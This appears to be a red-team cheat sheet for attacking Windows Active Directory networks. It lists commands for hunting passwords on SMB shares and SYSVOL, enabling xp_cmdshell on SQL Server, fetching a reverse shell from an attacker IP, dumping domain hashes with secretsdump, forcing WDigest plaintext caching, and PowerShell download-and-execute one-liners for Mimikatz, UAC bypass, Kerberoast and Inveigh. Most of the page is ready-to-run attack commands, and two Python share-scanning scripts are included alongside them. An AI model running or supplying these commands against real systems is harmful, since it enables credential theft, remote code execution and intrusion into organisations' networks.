Powerview Find-InterestingFile
Plunder http://joshstone.us/plunder/
CrackMapExec
Note: I strongly recommend that you comment out lines 62 and 63 in /usr/bin/smbmap before running this. Otherwise you'll have many screens of rotating status "/" in your log file.
smbmap -d [domain] -u [username] -p [password or NTLM hash] -R [share] -H [server] --depth 5 -g | tee shares.log
Search log file for credentials:
grep -i -e passw -e unattend.xml -e secret -e accounts -e login shares.log
(grep's --include filters only apply to recursive directory searches, so they have no effect when grepping a single log file; filter on extension with a second grep if needed.)
apt-get install -y cifs-utils
mount -t cifs -o ro,domain=[domain],username=[username],password=[password],sec=ntlmv2 //hostnameOrIP/Share /path/to/localdir
-OR-
mount.cifs //172.16.42.52/C /root/share -o username=<user>
grep -irn --include \*.txt --include \*.doc --include \*.xls --include \*.xlsx passw
Search file names:
find . -iname "*passw*" | grep -e '\.txt$' -e '\.xlsx$' -e '\.xls$' -e '\.doc$'
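As an added example (not from the original page), the mount-then-search step above as a single Python pass over the mounted share: it applies the same extension filter and search terms, reports name hits and content hits with line numbers, skips oversize and unreadable files, and builds a small constructed sample tree so it runs offline.

```python
"""Audit a mounted share for files whose name or contents suggest stored
credentials (the grep -irn / find -iname lines above, done in one pass).
Added example, not from the original page."""
import os
import re
import tempfile

# Same extensions and terms as the grep/find lines above; adjust as needed.
EXTENSIONS = {".txt", ".doc", ".xls", ".xlsx"}
CONTENT_TERMS = re.compile(rb"passw|unattend\.xml|secret|accounts|login", re.I)
NAME_TERM = re.compile(r"passw", re.I)
MAX_BYTES = 5 * 1024 * 1024  # skip very large files instead of reading them whole

def scan_share(root: str) -> list[dict]:
    """One record per hit: path, reason ('name' or 'content') and the 1-based
    line number for content hits (None for name hits)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            if NAME_TERM.search(name):
                hits.append({"path": path, "reason": "name", "line": None})
            try:
                if os.path.getsize(path) > MAX_BYTES:
                    continue
                with open(path, "rb") as fh:  # bytes: .doc/.xls are binary
                    for lineno, line in enumerate(fh, 1):
                        if CONTENT_TERMS.search(line):
                            hits.append({"path": path, "reason": "content", "line": lineno})
                            break  # one content hit per file is enough for triage
            except OSError:
                continue  # unreadable on the share: skip it, keep walking
    return hits

def build_sample_share() -> str:
    """Constructed sample files standing in for a mounted share (not real data)."""
    root = tempfile.mkdtemp(prefix="share_")
    os.makedirs(os.path.join(root, "IT", "old"))
    samples = {
        os.path.join("IT", "passwords.xlsx"): b"\xd0\xcf\x11\xe0\x00binary",
        os.path.join("IT", "old", "notes.txt"): b"ticket 42\nlogin: svc_backup\n",
        "readme.md": b"password=example\n",  # wrong extension: deliberately skipped
    }
    for rel, data in samples.items():
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(data)
    return root
```

Point scan_share at the cifs mount point from the mount command above to run it against a real share.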
smbclient --pw-nt-hash -W [domain] -U [username]%[NT Hash] //[IP or hostname]/[share]
Launch a cmd prompt as another user:
runas /netonly /user:[Domain]\[username] cmd.exe
Start PowerShell:
powershell -nop -exec bypass
Import-Module [full path to PowerView.ps1]
Verify you have authenticated access:
Get-NetDomainControllers
Run Invoke-ShareFinder:
Invoke-ShareFinder -Verbose -HostList [./hostlist.txt] -ExcludeStandard -CheckShareAccess | Out-File -Encoding ASCII Found-Shares.txt
findstr /s /n /i /p password \\example.com\sysvol\example.com\*
Invoke-FileFinder [Optional: -ShareList shares.txt] -Terms [comma separated terms] -OutFile interesting_files.csv
In addition to RDP'ing into a host to run MS database tools, you can use DBVisualizer (free) over sshuttle, Metasploit, and SQShell.
Launch a cmd prompt as another user:
runas /netonly /user:[Domain]\[username] cmd.exe
Start PowerShell:
powershell -nop -exec bypass
Import-Module [full path to PowerUpSQL.psd1]
Verify you have authenticated access:
Get-NetDomainControllers
Get-SQLInstanceDomain -Verbose
Invoke-SQLDumpInfo -Verbose -Instance "SQLServer1\STANDARDDEV2014"
... review output csv files.
Invoke-SQLAudit -Verbose -Instance "SQLServer1\STANDARDDEV2014"
$Servers = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -eq "Accessible"}
$Servers | Get-SQLServerInfo -Verbose
$Servers | Invoke-SQLAudit -Verbose
SQShell: http://joshstone.us/sqshell/
sqsh connect:
sqsh -S [Server IP] -U sa -P [password]
Execute commands:
xp_cmdshell 'whoami'
go
Enable xp_cmdshell:
EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go
Rotten Potato
xp_cmdshell "whoami /priv"
Look for "SeImpersonatePrivilege"
Get a reverse shell (Use Nishang Invoke-PowerShellTcp.ps1):
xp_cmdshell "powershell IEX(New-Object Net.webclient).downloadString('http://[PTK IP]:[port]/[scriptname.ps1]')"
go
/opt/impacket/examples/secretsdump.py [Domain]/[username]@[DC FQDN] | tee /path/to/outputfile
-OR-
crackmapexec smb [IP] -u [username] -p [password] --ntds drsuapi
Output log of cme will be in /root/.cme/logs
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"
Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1');Invoke-AllChecks"
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -Proxy Y -LogOutput Y -FileOutput Y"
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"
Search SYSVOL for Group Policy Preference passwords (PowerShell, then the cmd.exe equivalent):
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)
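As an added example (not part of the original page), the SYSVOL cpassword check above in a form a defender can run over a SYSVOL copy during MS14-025 clean-up: it parses each GPP XML file and reports which element and account still carry a cpassword attribute, without doing anything with the value. The attribute names userName, runAs and accountName are the ones GPP uses for groups, scheduled tasks and services; the policy GUID and cpassword in the constructed sample are placeholders.

```python
"""Audit Group Policy Preference XML under a SYSVOL copy for leftover cpassword
attributes (what the findstr one-liner above greps for, made reportable for
MS14-025 clean-up). Added example, not from the original page."""
import os
import tempfile
import xml.etree.ElementTree as ET

# The attribute naming the target account differs per preference type.
ACCOUNT_ATTRS = ("userName", "runAs", "accountName")

def find_cpassword(root: str) -> list[dict]:
    """Parse every .xml below root; one record per element carrying cpassword."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".xml"):
                continue
            path = os.path.join(dirpath, name)
            try:
                tree = ET.parse(path)
            except (ET.ParseError, OSError):
                continue  # malformed or unreadable: skip it, keep auditing
            for elem in tree.iter():
                if "cpassword" not in elem.attrib:
                    continue
                account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), None)
                findings.append({"file": os.path.relpath(path, root),
                                 "element": elem.tag, "account": account})
    return findings

def build_sample_sysvol() -> str:
    """Constructed SYSVOL-like tree (placeholder GUID and cpassword, not real data)."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    prefs = os.path.join(root, "example.com", "Policies", "{POLICY-GUID-PLACEHOLDER}",
                         "Machine", "Preferences")
    os.makedirs(os.path.join(prefs, "Groups"))
    os.makedirs(os.path.join(prefs, "Registry"))
    groups_xml = ('<?xml version="1.0" encoding="utf-8"?>\n'
                  '<Groups><User name="LocalAdmin">'
                  '<Properties action="U" userName="LocalAdmin" '
                  'cpassword="PLACEHOLDER_NOT_A_REAL_VALUE"/></User></Groups>\n')
    registry_xml = ('<?xml version="1.0" encoding="utf-8"?>\n'
                    '<RegistrySettings><Registry name="Example"/></RegistrySettings>\n')
    with open(os.path.join(prefs, "Groups", "Groups.xml"), "w") as fh:
        fh.write(groups_xml)
    with open(os.path.join(prefs, "Registry", "Registry.xml"), "w") as fh:
        fh.write(registry_xml)
    return root
```

Each finding is a policy file that should be fixed by removing the preference item and rotating the account it set.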
Run a PowerShell prompt as a different user without loading a profile on the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1